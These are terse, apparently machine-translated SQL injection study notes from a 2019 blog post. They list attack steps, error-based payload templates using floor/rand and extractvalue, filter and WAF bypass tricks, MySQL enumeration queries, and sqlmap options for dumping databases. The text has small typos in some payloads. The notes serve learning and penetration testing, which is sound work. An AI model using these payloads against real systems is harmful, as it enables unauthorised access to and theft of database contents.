sql injection knowledge consolidation (Basic Edition)
Others
2019-07-21 23:03:07
views: null
sql injection knowledge consolidation (Basic Edition)
The basic steps
-
Determine whether the error
-
Analyzing closed symbols
-
Analyzing injection type
-
Construction of payload
-
Manual injection or scripting
The basic injection type
-
Error-type implant
-
floor formula (results - a 1): and (select 1 from (select count (*), concat ((payload), floor (rand (0) * 2)) x from information_schema.tables group by x) a)
-
extractvalue formula (both have a wave number): and extracvalue (1, concat (0x7e, (payload), 0x7e)
-
Boolean injection
-
Joint query
-
Delay Injection
Other injection techniques
-
HPP bypass WAF
-
Injection byte wide filter bypass quotes
-
CHAR function filter bypass quotes
-
|| and && bypass the filter and and or
-
Delimiting character string to bypass a filter
-
Secondary injection
-
Linux special characters to bypass the space filter
-
Bracketing bypass the filter box
Common SQL statements and functions
-
Take substring: mid (string, start, length)
-
Take substring: left (string, length)
-
取ASCII:ascii(char)
-
Query the current database: database ()
-
Query the current user: user ()
-
The current database version: @@ version
-
Database file path: @@ datadir
-
爆表:select table_name from information_schema.tables where table_schema='database'
-
爆库:select column_name from information_schema.columns where table_schem='database' and table_name='table'
-
String concatenation: concat ()
-
String in the set of output: group_concat ()
-
Separator according connection: concat_ws (char, ...)
-
The number of fields guess: ORDER BY x
sqlmap use basis
-
-u specified url
-
-p parameter specified
-
-D specifies the database
-
-T specified table
-
-C specified field
-
--current-db current database
-
--current-user of the current user
-
--dbs all database queries
-
--tables query all the tables
-
--columns query all the field names
-
--dump Search record
-
--techniques X (X = B Boolean, E being given, U-joint injection type, T-type delay): Specifies the type of injection
important point
Origin www.cnblogs.com/tiumo/p/11222154.html